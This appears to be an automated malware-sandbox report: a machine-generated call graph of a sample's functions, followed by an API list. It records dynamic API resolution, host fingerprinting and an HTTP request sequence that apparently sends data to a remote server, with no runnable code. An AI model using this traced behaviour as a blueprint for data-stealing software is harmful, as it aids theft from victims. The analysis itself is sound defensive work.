26210 624a60 2 API calls 26209->26210 26211 623996 26210->26211 26212 624a60 2 API calls 26211->26212 26213 6239af 26212->26213 26214 624a60 2 API calls 26213->26214 26215 6239c5 26214->26215 26216 624a60 2 API calls 26215->26216 26217 6239db 26216->26217 26218 624a60 2 API calls 26217->26218 26219 6239f1 26218->26219 26220 624a60 2 API calls 26219->26220 26221 623a07 26220->26221 26222 624a60 2 API calls 26221->26222 26223 623a1d 26222->26223 26224 624a60 2 API calls 26223->26224 26225 623a36 26224->26225 26226 624a60 2 API calls 26225->26226 26227 623a4c 26226->26227 26228 624a60 2 API calls 26227->26228 26229 623a62 26228->26229 26230 624a60 2 API calls 26229->26230 26231 623a78 26230->26231 26232 624a60 2 API calls 26231->26232 26233 623a8e 26232->26233 26234 624a60 2 API calls 26233->26234 26235 623aa4 26234->26235 26236 624a60 2 API calls 26235->26236 26237 623abd 26236->26237 26238 624a60 2 API calls 26237->26238 26239 623ad3 26238->26239 26240 624a60 2 API calls 26239->26240 26241 623ae9 26240->26241 26242 624a60 2 API calls 26241->26242 26243 623aff 26242->26243 26244 624a60 2 API calls 26243->26244 26245 623b15 26244->26245 26246 624a60 2 API calls 26245->26246 26247 623b2b 26246->26247 26248 624a60 2 API calls 26247->26248 26249 623b44 26248->26249 26250 624a60 2 API calls 26249->26250 26251 623b5a 26250->26251 26252 624a60 2 API calls 26251->26252 26253 623b70 26252->26253 26254 624a60 2 API calls 26253->26254 26255 623b86 26254->26255 26256 624a60 2 API calls 26255->26256 26257 623b9c 26256->26257 26258 624a60 2 API calls 26257->26258 26259 623bb2 26258->26259 26260 624a60 2 API calls 26259->26260 26261 623bcb 26260->26261 26262 624a60 2 API calls 26261->26262 26263 623be1 26262->26263 26264 624a60 2 API calls 26263->26264 26265 623bf7 26264->26265 26266 624a60 2 API calls 26265->26266 26267 623c0d 26266->26267 26268 624a60 2 API calls 26267->26268 26269 623c23 26268->26269 26270 624a60 2 API calls 26269->26270 26271 623c39 26270->26271 26272 624a60 2 
API calls 26271->26272 26273 623c52 26272->26273 26274 624a60 2 API calls 26273->26274 26275 623c68 26274->26275 26276 624a60 2 API calls 26275->26276 26277 623c7e 26276->26277 26278 624a60 2 API calls 26277->26278 26279 623c94 26278->26279 26280 624a60 2 API calls 26279->26280 26281 623caa 26280->26281 26282 624a60 2 API calls 26281->26282 26283 623cc0 26282->26283 26284 624a60 2 API calls 26283->26284 26285 623cd9 26284->26285 26286 624a60 2 API calls 26285->26286 26287 623cef 26286->26287 26288 624a60 2 API calls 26287->26288 26289 623d05 26288->26289 26290 624a60 2 API calls 26289->26290 26291 623d1b 26290->26291 26292 624a60 2 API calls 26291->26292 26293 623d31 26292->26293 26294 624a60 2 API calls 26293->26294 26295 623d47 26294->26295 26296 624a60 2 API calls 26295->26296 26297 623d60 26296->26297 26298 624a60 2 API calls 26297->26298 26299 623d76 26298->26299 26300 624a60 2 API calls 26299->26300 26301 623d8c 26300->26301 26302 624a60 2 API calls 26301->26302 26303 623da2 26302->26303 26304 624a60 2 API calls 26303->26304 26305 623db8 26304->26305 26306 624a60 2 API calls 26305->26306 26307 623dce 26306->26307 26308 624a60 2 API calls 26307->26308 26309 623de7 26308->26309 26310 624a60 2 API calls 26309->26310 26311 623dfd 26310->26311 26312 624a60 2 API calls 26311->26312 26313 623e13 26312->26313 26314 624a60 2 API calls 26313->26314 26315 623e29 26314->26315 26316 624a60 2 API calls 26315->26316 26317 623e3f 26316->26317 26318 624a60 2 API calls 26317->26318 26319 623e55 26318->26319 26320 624a60 2 API calls 26319->26320 26321 623e6e 26320->26321 26322 624a60 2 API calls 26321->26322 26323 623e84 26322->26323 26324 624a60 2 API calls 26323->26324 26325 623e9a 26324->26325 26326 624a60 2 API calls 26325->26326 26327 623eb0 26326->26327 26328 624a60 2 API calls 26327->26328 26329 623ec6 26328->26329 26330 624a60 2 API calls 26329->26330 26331 623edc 26330->26331 26332 624a60 2 API calls 26331->26332 26333 623ef5 26332->26333 26334 624a60 2 API calls 
26333->26334 26335 623f0b 26334->26335 26336 624a60 2 API calls 26335->26336 26337 623f21 26336->26337 26338 624a60 2 API calls 26337->26338 26339 623f37 26338->26339 26340 624a60 2 API calls 26339->26340 26341 623f4d 26340->26341 26342 624a60 2 API calls 26341->26342 26343 623f63 26342->26343 26344 624a60 2 API calls 26343->26344 26345 623f7c 26344->26345 26346 624a60 2 API calls 26345->26346 26347 623f92 26346->26347 26348 624a60 2 API calls 26347->26348 26349 623fa8 26348->26349 26350 624a60 2 API calls 26349->26350 26351 623fbe 26350->26351 26352 624a60 2 API calls 26351->26352 26353 623fd4 26352->26353 26354 624a60 2 API calls 26353->26354 26355 623fea 26354->26355 26356 624a60 2 API calls 26355->26356 26357 624003 26356->26357 26358 624a60 2 API calls 26357->26358 26359 624019 26358->26359 26360 624a60 2 API calls 26359->26360 26361 62402f 26360->26361 26362 624a60 2 API calls 26361->26362 26363 624045 26362->26363 26364 624a60 2 API calls 26363->26364 26365 62405b 26364->26365 26366 624a60 2 API calls 26365->26366 26367 624071 26366->26367 26368 624a60 2 API calls 26367->26368 26369 62408a 26368->26369 26370 624a60 2 API calls 26369->26370 26371 6240a0 26370->26371 26372 624a60 2 API calls 26371->26372 26373 6240b6 26372->26373 26374 624a60 2 API calls 26373->26374 26375 6240cc 26374->26375 26376 624a60 2 API calls 26375->26376 26377 6240e2 26376->26377 26378 624a60 2 API calls 26377->26378 26379 6240f8 26378->26379 26380 624a60 2 API calls 26379->26380 26381 624111 26380->26381 26382 624a60 2 API calls 26381->26382 26383 624127 26382->26383 26384 624a60 2 API calls 26383->26384 26385 62413d 26384->26385 26386 624a60 2 API calls 26385->26386 26387 624153 26386->26387 26388 624a60 2 API calls 26387->26388 26389 624169 26388->26389 26390 624a60 2 API calls 26389->26390 26391 62417f 26390->26391 26392 624a60 2 API calls 26391->26392 26393 624198 26392->26393 26394 624a60 2 API calls 26393->26394 26395 6241ae 26394->26395 26396 624a60 2 API calls 26395->26396 
26397 6241c4 26396->26397 26398 624a60 2 API calls 26397->26398 26399 6241da 26398->26399 26400 624a60 2 API calls 26399->26400 26401 6241f0 26400->26401 26402 624a60 2 API calls 26401->26402 26403 624206 26402->26403 26404 624a60 2 API calls 26403->26404 26405 62421f 26404->26405 26406 624a60 2 API calls 26405->26406 26407 624235 26406->26407 26408 624a60 2 API calls 26407->26408 26409 62424b 26408->26409 26410 624a60 2 API calls 26409->26410 26411 624261 26410->26411 26412 624a60 2 API calls 26411->26412 26413 624277 26412->26413 26414 624a60 2 API calls 26413->26414 26415 62428d 26414->26415 26416 624a60 2 API calls 26415->26416 26417 6242a6 26416->26417 26418 624a60 2 API calls 26417->26418 26419 6242bc 26418->26419 26420 624a60 2 API calls 26419->26420 26421 6242d2 26420->26421 26422 624a60 2 API calls 26421->26422 26423 6242e8 26422->26423 26424 624a60 2 API calls 26423->26424 26425 6242fe 26424->26425 26426 624a60 2 API calls 26425->26426 26427 624314 26426->26427 26428 624a60 2 API calls 26427->26428 26429 62432d 26428->26429 26430 624a60 2 API calls 26429->26430 26431 624343 26430->26431 26432 624a60 2 API calls 26431->26432 26433 624359 26432->26433 26434 624a60 2 API calls 26433->26434 26435 62436f 26434->26435 26436 624a60 2 API calls 26435->26436 26437 624385 26436->26437 26438 624a60 2 API calls 26437->26438 26439 62439b 26438->26439 26440 624a60 2 API calls 26439->26440 26441 6243b4 26440->26441 26442 624a60 2 API calls 26441->26442 26443 6243ca 26442->26443 26444 624a60 2 API calls 26443->26444 26445 6243e0 26444->26445 26446 624a60 2 API calls 26445->26446 26447 6243f6 26446->26447 26448 624a60 2 API calls 26447->26448 26449 62440c 26448->26449 26450 624a60 2 API calls 26449->26450 26451 624422 26450->26451 26452 624a60 2 API calls 26451->26452 26453 62443b 26452->26453 26454 624a60 2 API calls 26453->26454 26455 624451 26454->26455 26456 624a60 2 API calls 26455->26456 26457 624467 26456->26457 26458 624a60 2 API calls 26457->26458 26459 62447d 
26458->26459 26460 624a60 2 API calls 26459->26460 26461 624493 26460->26461 26462 624a60 2 API calls 26461->26462 26463 6244a9 26462->26463 26464 624a60 2 API calls 26463->26464 26465 6244c2 26464->26465 26466 624a60 2 API calls 26465->26466 26467 6244d8 26466->26467 26468 624a60 2 API calls 26467->26468 26469 6244ee 26468->26469 26470 624a60 2 API calls 26469->26470 26471 624504 26470->26471 26472 624a60 2 API calls 26471->26472 26473 62451a 26472->26473 26474 624a60 2 API calls 26473->26474 26475 624530 26474->26475 26476 624a60 2 API calls 26475->26476 26477 624549 26476->26477 26478 624a60 2 API calls 26477->26478 26479 62455f 26478->26479 26480 624a60 2 API calls 26479->26480 26481 624575 26480->26481 26482 624a60 2 API calls 26481->26482 26483 62458b 26482->26483 26484 624a60 2 API calls 26483->26484 26485 6245a1 26484->26485 26486 624a60 2 API calls 26485->26486 26487 6245b7 26486->26487 26488 624a60 2 API calls 26487->26488 26489 6245d0 26488->26489 26490 624a60 2 API calls 26489->26490 26491 6245e6 26490->26491 26492 624a60 2 API calls 26491->26492 26493 6245fc 26492->26493 26494 624a60 2 API calls 26493->26494 26495 624612 26494->26495 26496 624a60 2 API calls 26495->26496 26497 624628 26496->26497 26498 624a60 2 API calls 26497->26498 26499 62463e 26498->26499 26500 624a60 2 API calls 26499->26500 26501 624657 26500->26501 26502 624a60 2 API calls 26501->26502 26503 62466d 26502->26503 26504 624a60 2 API calls 26503->26504 26505 624683 26504->26505 26506 624a60 2 API calls 26505->26506 26507 624699 26506->26507 26508 624a60 2 API calls 26507->26508 26509 6246af 26508->26509 26510 624a60 2 API calls 26509->26510 26511 6246c5 26510->26511 26512 624a60 2 API calls 26511->26512 26513 6246de 26512->26513 26514 624a60 2 API calls 26513->26514 26515 6246f4 26514->26515 26516 624a60 2 API calls 26515->26516 26517 62470a 26516->26517 26518 624a60 2 API calls 26517->26518 26519 624720 26518->26519 26520 624a60 2 API calls 26519->26520 26521 624736 26520->26521 
26522 624a60 2 API calls 26521->26522 26523 62474c 26522->26523 26524 624a60 2 API calls 26523->26524 26525 624765 26524->26525 26526 624a60 2 API calls 26525->26526 26527 62477b 26526->26527 26528 624a60 2 API calls 26527->26528 26529 624791 26528->26529 26530 624a60 2 API calls 26529->26530 26531 6247a7 26530->26531 26532 624a60 2 API calls 26531->26532 26533 6247bd 26532->26533 26534 624a60 2 API calls 26533->26534 26535 6247d3 26534->26535 26536 624a60 2 API calls 26535->26536 26537 6247ec 26536->26537 26538 624a60 2 API calls 26537->26538 26539 624802 26538->26539 26540 624a60 2 API calls 26539->26540 26541 624818 26540->26541 26542 624a60 2 API calls 26541->26542 26543 62482e 26542->26543 26544 624a60 2 API calls 26543->26544 26545 624844 26544->26545 26546 624a60 2 API calls 26545->26546 26547 62485a 26546->26547 26548 624a60 2 API calls 26547->26548 26549 624873 26548->26549 26550 624a60 2 API calls 26549->26550 26551 624889 26550->26551 26552 624a60 2 API calls 26551->26552 26553 62489f 26552->26553 26554 624a60 2 API calls 26553->26554 26555 6248b5 26554->26555 26556 624a60 2 API calls 26555->26556 26557 6248cb 26556->26557 26558 624a60 2 API calls 26557->26558 26559 6248e1 26558->26559 26560 624a60 2 API calls 26559->26560 26561 6248fa 26560->26561 26562 624a60 2 API calls 26561->26562 26563 624910 26562->26563 26564 624a60 2 API calls 26563->26564 26565 624926 26564->26565 26566 624a60 2 API calls 26565->26566 26567 62493c 26566->26567 26568 624a60 2 API calls 26567->26568 26569 624952 26568->26569 26570 624a60 2 API calls 26569->26570 26571 624968 26570->26571 26572 624a60 2 API calls 26571->26572 26573 624981 26572->26573 26574 624a60 2 API calls 26573->26574 26575 624997 26574->26575 26576 624a60 2 API calls 26575->26576 26577 6249ad 26576->26577 26578 624a60 2 API calls 26577->26578 26579 6249c3 26578->26579 26580 624a60 2 API calls 26579->26580 26581 6249d9 26580->26581 26582 624a60 2 API calls 26581->26582 26583 6249ef 26582->26583 26584 624a60 2 
API calls 26583->26584 26585 624a08 26584->26585 26586 624a60 2 API calls 26585->26586 26587 624a1e 26586->26587 26588 624a60 2 API calls 26587->26588 26589 624a34 26588->26589 26590 624a60 2 API calls 26589->26590 26591 624a4a 26590->26591 26592 6466e0 26591->26592 26593 6466ed 43 API calls 26592->26593 26594 646afe 8 API calls 26592->26594 26593->26594 26595 646b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26594->26595 26596 646c08 26594->26596 26595->26596 26597 646c15 8 API calls 26596->26597 26598 646cd2 26596->26598 26597->26598 26599 646d4f 26598->26599 26600 646cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26598->26600 26601 646d5c 6 API calls 26599->26601 26602 646de9 26599->26602 26600->26599 26601->26602 26603 646df6 12 API calls 26602->26603 26604 646f10 26602->26604 26603->26604 26605 646f8d 26604->26605 26606 646f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26604->26606 26607 646f96 GetProcAddress GetProcAddress 26605->26607 26608 646fc1 26605->26608 26606->26605 26607->26608 26609 646ff5 26608->26609 26610 646fca GetProcAddress GetProcAddress 26608->26610 26611 647002 10 API calls 26609->26611 26612 6470ed 26609->26612 26610->26609 26611->26612 26613 6470f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26612->26613 26614 647152 26612->26614 26613->26614 26615 64716e 26614->26615 26616 64715b GetProcAddress 26614->26616 26617 647177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26615->26617 26618 64051f 26615->26618 26616->26615 26617->26618 26619 621530 26618->26619 26928 621610 26619->26928 26621 62153b 26622 621555 lstrcpy 26621->26622 26623 62155d 26621->26623 26622->26623 26624 621577 lstrcpy 26623->26624 26625 62157f 26623->26625 26624->26625 26626 621599 lstrcpy 26625->26626 26627 6215a1 26625->26627 26626->26627 26628 621605 26627->26628 26629 6215fd lstrcpy 26627->26629 26630 63f1b0 lstrlen 26628->26630 26629->26628 
26631 63f1e4 26630->26631 26632 63f1f7 lstrlen 26631->26632 26633 63f1eb lstrcpy 26631->26633 26634 63f208 26632->26634 26633->26632 26635 63f21b lstrlen 26634->26635 26636 63f20f lstrcpy 26634->26636 26637 63f22c 26635->26637 26636->26635 26638 63f233 lstrcpy 26637->26638 26639 63f23f 26637->26639 26638->26639 26640 63f258 lstrcpy 26639->26640 26641 63f264 26639->26641 26640->26641 26642 63f286 lstrcpy 26641->26642 26643 63f292 26641->26643 26642->26643 26644 63f2ba lstrcpy 26643->26644 26645 63f2c6 26643->26645 26644->26645 26646 63f2ea lstrcpy 26645->26646 26708 63f300 26645->26708 26646->26708 26647 63f30c lstrlen 26647->26708 26648 63f4b9 lstrcpy 26648->26708 26649 63f3a1 lstrcpy 26649->26708 26650 63f3c5 lstrcpy 26650->26708 26651 621530 8 API calls 26651->26708 26652 63f4e8 lstrcpy 26683 63f4f0 26652->26683 26653 621530 8 API calls 26653->26683 26654 63f479 lstrcpy 26654->26708 26655 63f59c lstrcpy 26655->26683 26656 63f70f StrCmpCA 26661 63fe8e 26656->26661 26656->26708 26657 63f616 StrCmpCA 26657->26656 26657->26683 26658 63fa29 StrCmpCA 26669 63fe2b 26658->26669 26658->26708 26659 63f73e lstrlen 26659->26708 26660 63fd4d StrCmpCA 26663 63fd60 Sleep 26660->26663 26675 63fd75 26660->26675 26662 63fead lstrlen 26661->26662 26666 63fea5 lstrcpy 26661->26666 26667 63fec7 26662->26667 26663->26708 26664 63fa58 lstrlen 26664->26708 26665 63f64a lstrcpy 26665->26683 26666->26662 26673 63fee7 lstrlen 26667->26673 26677 63fedf lstrcpy 26667->26677 26668 63fe4a lstrlen 26671 63fe64 26668->26671 26669->26668 26670 63fe42 lstrcpy 26669->26670 26670->26668 26682 63fdce lstrlen 26671->26682 26684 63fe7c lstrcpy 26671->26684 26672 63f89e lstrcpy 26672->26708 26680 63ff01 26673->26680 26674 63fd94 lstrlen 26689 63fdae 26674->26689 26675->26674 26678 63fd8c lstrcpy 26675->26678 26676 63f76f lstrcpy 26676->26708 26677->26673 26678->26674 26679 63fbb8 lstrcpy 26679->26708 26688 63ff21 26680->26688 26691 63ff19 lstrcpy 26680->26691 26681 63fa89 lstrcpy 26681->26708 26690 
63fde8 26682->26690 26683->26653 26683->26655 26683->26657 26683->26658 26683->26660 26683->26665 26694 63f698 lstrcpy 26683->26694 26697 63efb0 35 API calls 26683->26697 26703 63f924 lstrcpy 26683->26703 26704 63f99e StrCmpCA 26683->26704 26706 63fc3e lstrcpy 26683->26706 26707 63fcb8 StrCmpCA 26683->26707 26683->26708 26709 63f9cb lstrcpy 26683->26709 26710 63fce9 lstrcpy 26683->26710 26711 63ee90 28 API calls 26683->26711 26712 63fa19 lstrcpy 26683->26712 26713 63fd3a lstrcpy 26683->26713 26684->26682 26685 63f791 lstrcpy 26685->26708 26687 63f8cd lstrcpy 26687->26683 26692 621610 4 API calls 26688->26692 26689->26682 26695 63fdc6 lstrcpy 26689->26695 26698 63fe08 26690->26698 26700 63fe00 lstrcpy 26690->26700 26691->26688 26714 63fe13 26692->26714 26693 63faab lstrcpy 26693->26708 26694->26683 26695->26682 26696 63fbe7 lstrcpy 26696->26683 26697->26683 26701 621610 4 API calls 26698->26701 26699 63ee90 28 API calls 26699->26708 26700->26698 26701->26714 26702 63f7e2 lstrcpy 26702->26708 26703->26683 26704->26658 26704->26683 26705 63fafc lstrcpy 26705->26708 26706->26683 26707->26660 26707->26683 26708->26647 26708->26648 26708->26649 26708->26650 26708->26651 26708->26652 26708->26654 26708->26656 26708->26658 26708->26659 26708->26660 26708->26664 26708->26672 26708->26676 26708->26679 26708->26681 26708->26683 26708->26685 26708->26687 26708->26693 26708->26696 26708->26699 26708->26702 26708->26705 26709->26683 26710->26683 26711->26683 26712->26683 26713->26683 26714->25738 26716 642785 26715->26716 26717 64278c GetVolumeInformationA 26715->26717 26716->26717 26718 6427ec GetProcessHeap RtlAllocateHeap 26717->26718 26720 642826 wsprintfA 26718->26720 26721 642822 26718->26721 26720->26721 26938 6471e0 26721->26938 26725 624c70 26724->26725 26726 624c85 26725->26726 26727 624c7d lstrcpy 26725->26727 26942 624bc0 26726->26942 26727->26726 26729 624c90 26730 624ccc lstrcpy 26729->26730 26731 624cd8 26729->26731 26730->26731 26732 624cff lstrcpy 26731->26732 
26733 624d0b 26731->26733 26732->26733 26734 624d2f lstrcpy 26733->26734 26735 624d3b 26733->26735 26734->26735 26736 624d6d lstrcpy 26735->26736 26737 624d79 26735->26737 26736->26737 26738 624da0 lstrcpy 26737->26738 26739 624dac InternetOpenA StrCmpCA 26737->26739 26738->26739 26740 624de0 26739->26740 26741 6254b8 InternetCloseHandle CryptStringToBinaryA 26740->26741 26946 643e70 26740->26946 26742 6254e8 LocalAlloc 26741->26742 26759 6255d8 26741->26759 26744 6254ff CryptStringToBinaryA 26742->26744 26742->26759 26745 625517 LocalFree 26744->26745 26746 625529 lstrlen 26744->26746 26745->26759 26747 62553d 26746->26747 26749 625563 lstrlen 26747->26749 26750 625557 lstrcpy 26747->26750 26748 624dfa 26751 624e23 lstrcpy lstrcat 26748->26751 26752 624e38 26748->26752 26754 62557d 26749->26754 26750->26749 26751->26752 26753 624e5a lstrcpy 26752->26753 26756 624e62 26752->26756 26753->26756 26755 62558f lstrcpy lstrcat 26754->26755 26757 6255a2 26754->26757 26755->26757 26758 624e71 lstrlen 26756->26758 26761 6255d1 26757->26761 26762 6255c9 lstrcpy 26757->26762 26760 624e89 26758->26760 26759->25767 26763 624e95 lstrcpy lstrcat 26760->26763 26764 624eac 26760->26764 26761->26759 26762->26761 26763->26764 26765 624ed5 26764->26765 26766 624ecd lstrcpy 26764->26766 26767 624edc lstrlen 26765->26767 26766->26765 26768 624ef2 26767->26768 26769 624efe lstrcpy lstrcat 26768->26769 26770 624f15 26768->26770 26769->26770 26771 624f36 lstrcpy 26770->26771 26772 624f3e 26770->26772 26771->26772 26773 624f65 lstrcpy lstrcat 26772->26773 26774 624f7b 26772->26774 26773->26774 26775 624fa4 26774->26775 26776 624f9c lstrcpy 26774->26776 26777 624fab lstrlen 26775->26777 26776->26775 26778 624fc1 26777->26778 26779 624fcd lstrcpy lstrcat 26778->26779 26780 624fe4 26778->26780 26779->26780 26781 62500d 26780->26781 26782 625005 lstrcpy 26780->26782 26783 625014 lstrlen 26781->26783 26782->26781 26784 62502a 26783->26784 26785 625036 lstrcpy lstrcat 26784->26785 26786 62504d 
26784->26786 26785->26786 26787 625079 26786->26787 26788 625071 lstrcpy 26786->26788 26789 625080 lstrlen 26787->26789 26788->26787 26790 62509b 26789->26790 26791 6250ac lstrcpy lstrcat 26790->26791 26792 6250bc 26790->26792 26791->26792 26793 6250da lstrcpy lstrcat 26792->26793 26794 6250ed 26792->26794 26793->26794 26795 62510b lstrcpy 26794->26795 26796 625113 26794->26796 26795->26796 26797 625121 InternetConnectA 26796->26797 26797->26741 26798 625150 HttpOpenRequestA 26797->26798 26799 6254b1 InternetCloseHandle 26798->26799 26800 62518b 26798->26800 26799->26741 26953 647310 lstrlen 26800->26953 26804 6251a4 26961 6472c0 26804->26961 26807 647280 lstrcpy 26808 6251c0 26807->26808 26809 647310 3 API calls 26808->26809 26810 6251d5 26809->26810 26811 647280 lstrcpy 26810->26811 26812 6251de 26811->26812 26813 647310 3 API calls 26812->26813 26814 6251f4 26813->26814 26815 647280 lstrcpy 26814->26815 26816 6251fd 26815->26816 26817 647310 3 API calls 26816->26817 26818 625213 26817->26818 26819 647280 lstrcpy 26818->26819 26820 62521c 26819->26820 26821 647310 3 API calls 26820->26821 26822 625231 26821->26822 26823 647280 lstrcpy 26822->26823 26824 62523a 26823->26824 26825 6472c0 2 API calls 26824->26825 26826 62524d 26825->26826 26827 647280 lstrcpy 26826->26827 26828 625256 26827->26828 26829 647310 3 API calls 26828->26829 26830 62526b 26829->26830 26831 647280 lstrcpy 26830->26831 26832 625274 26831->26832 26833 647310 3 API calls 26832->26833 26834 625289 26833->26834 26835 647280 lstrcpy 26834->26835 26836 625292 26835->26836 26837 6472c0 2 API calls 26836->26837 26838 6252a5 26837->26838 26839 647280 lstrcpy 26838->26839 26840 6252ae 26839->26840 26841 647310 3 API calls 26840->26841 26842 6252c3 26841->26842 26843 647280 lstrcpy 26842->26843 26844 6252cc 26843->26844 26845 647310 3 API calls 26844->26845 26846 6252e2 26845->26846 26847 647280 lstrcpy 26846->26847 26848 6252eb 26847->26848 26849 647310 3 API calls 26848->26849 26850 625301 
26849->26850 26851 647280 lstrcpy 26850->26851 26852 62530a 26851->26852 26853 647310 3 API calls 26852->26853 26854 62531f 26853->26854 26855 647280 lstrcpy 26854->26855 26856 625328 26855->26856 26857 6472c0 2 API calls 26856->26857 26858 62533b 26857->26858 26859 647280 lstrcpy 26858->26859 26860 625344 26859->26860 26861 625370 lstrcpy 26860->26861 26862 62537c 26860->26862 26861->26862 26863 6472c0 2 API calls 26862->26863 26864 62538a 26863->26864 26865 6472c0 2 API calls 26864->26865 26866 625397 26865->26866 26867 647280 lstrcpy 26866->26867 26868 6253a1 26867->26868 26869 6253b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26868->26869 26870 62549c InternetCloseHandle 26869->26870 26874 6253f2 26869->26874 26872 6254ae 26870->26872 26871 6253fd lstrlen 26871->26874 26872->26799 26873 62542e lstrcpy lstrcat 26873->26874 26874->26870 26874->26871 26874->26873 26875 625473 26874->26875 26876 62546b lstrcpy 26874->26876 26877 62547a InternetReadFile 26875->26877 26876->26875 26877->26870 26877->26874 26879 638cc6 ExitProcess 26878->26879 26894 638ccd 26878->26894 26880 638ee2 26880->25769 26881 638d06 lstrlen 26881->26894 26882 638d84 StrCmpCA 26882->26894 26883 638da4 StrCmpCA 26883->26894 26884 638e88 lstrlen 26884->26894 26885 638e6f StrCmpCA 26885->26894 26886 638d30 lstrlen 26886->26894 26887 638e56 StrCmpCA 26887->26894 26888 638d5a lstrlen 26888->26894 26889 638dbd StrCmpCA 26889->26894 26890 638ddd StrCmpCA 26890->26894 26891 638dfd StrCmpCA 26891->26894 26892 638e1d StrCmpCA 26892->26894 26893 638e3d StrCmpCA 26893->26894 26894->26880 26894->26881 26894->26882 26894->26883 26894->26884 26894->26885 26894->26886 26894->26887 26894->26888 26894->26889 26894->26890 26894->26891 26894->26892 26894->26893 26895 638ebb lstrcpy 26894->26895 26895->26894 26896->25775 26897->25777 26898->25783 26899->25785 26900->25791 26901->25793 26902->25799 26903->25803 26904->25809 26905->25811 26906->25815 26907->25829 26908->25833 26909->25831 26910->25828 
26911->25831 26912->25846 26913->25867 26914->25837 26915->25838 26916->25861 26917->25863 26918->25871 26919->25875 26920->25876 26921->25886 26922->25890 26923->25889 26924->25885 26925->25889 26926->25899 26929 62161f 26928->26929 26930 62162b lstrcpy 26929->26930 26931 621633 26929->26931 26930->26931 26932 62164d lstrcpy 26931->26932 26934 621655 26931->26934 26932->26934 26933 621677 26936 621699 26933->26936 26937 621691 lstrcpy 26933->26937 26934->26933 26935 62166f lstrcpy 26934->26935 26935->26933 26936->26621 26937->26936 26939 6471e6 26938->26939 26940 642860 26939->26940 26941 6471fc lstrcpy 26939->26941 26940->25764 26941->26940 26943 624bd0 26942->26943 26943->26943 26944 624bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26943->26944 26945 624c41 26944->26945 26945->26729 26947 643e83 26946->26947 26948 643e9f lstrcpy 26947->26948 26949 643eab 26947->26949 26948->26949 26950 643ed5 GetSystemTime 26949->26950 26951 643ecd lstrcpy 26949->26951 26952 643ef3 26950->26952 26951->26950 26952->26748 26955 64732d 26953->26955 26954 62519b 26957 647280 26954->26957 26955->26954 26956 64733d lstrcpy lstrcat 26955->26956 26956->26954 26958 64728c 26957->26958 26959 6472b4 26958->26959 26960 6472ac lstrcpy 26958->26960 26959->26804 26960->26959 26963 6472dc 26961->26963 26962 6251b7 26962->26807 26963->26962 26964 6472ed lstrcpy lstrcat 26963->26964 26964->26962 26966 634c77 296 API calls 26994 6431f0 GetSystemInfo wsprintfA 26967 648471 123 API calls 2 library calls 26977 63e0f9 140 API calls 27010 636b79 138 API calls 26970 628c79 strlen malloc strcpy_s 27002 63f2f8 93 API calls 27011 621b64 162 API calls 27023 62bbf9 90 API calls 26978 643cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27012 638615 49 API calls 27024 6433c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27025 638615 48 API calls 26972 63e049 147 API calls 26979 642cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26973 642853 lstrcpy 26991 633959 244 API 
calls 26995 6301d9 126 API calls 26998 628e20 strlen malloc strcpy_s free std::exception::exception 26980 6430a0 GetSystemPowerStatus 26996 6429a0 GetCurrentProcess IsWow64Process 27013 634b29 304 API calls 27026 6323a9 298 API calls 27027 63abb2 120 API calls 26992 643130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27000 62f639 144 API calls 27003 6216b9 200 API calls 27016 62bf39 177 API calls 27018 627702 free ctype 26981 642880 10 API calls 26982 644480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 26983 643480 6 API calls 27004 643280 7 API calls 26984 638c88 16 API calls 27019 62b309 98 API calls 26993 644e35 10 API calls 26974 642c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27021 649711 134 API calls __setmbcp 27028 638615 47 API calls 26985 64749e 8 API calls ctype 26986 632499 290 API calls 27029 62db99 675 API calls 26976 648819 6 API calls __getptd
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00624C7F
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624CD2
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624D05
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624D35
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624D73
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00624DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
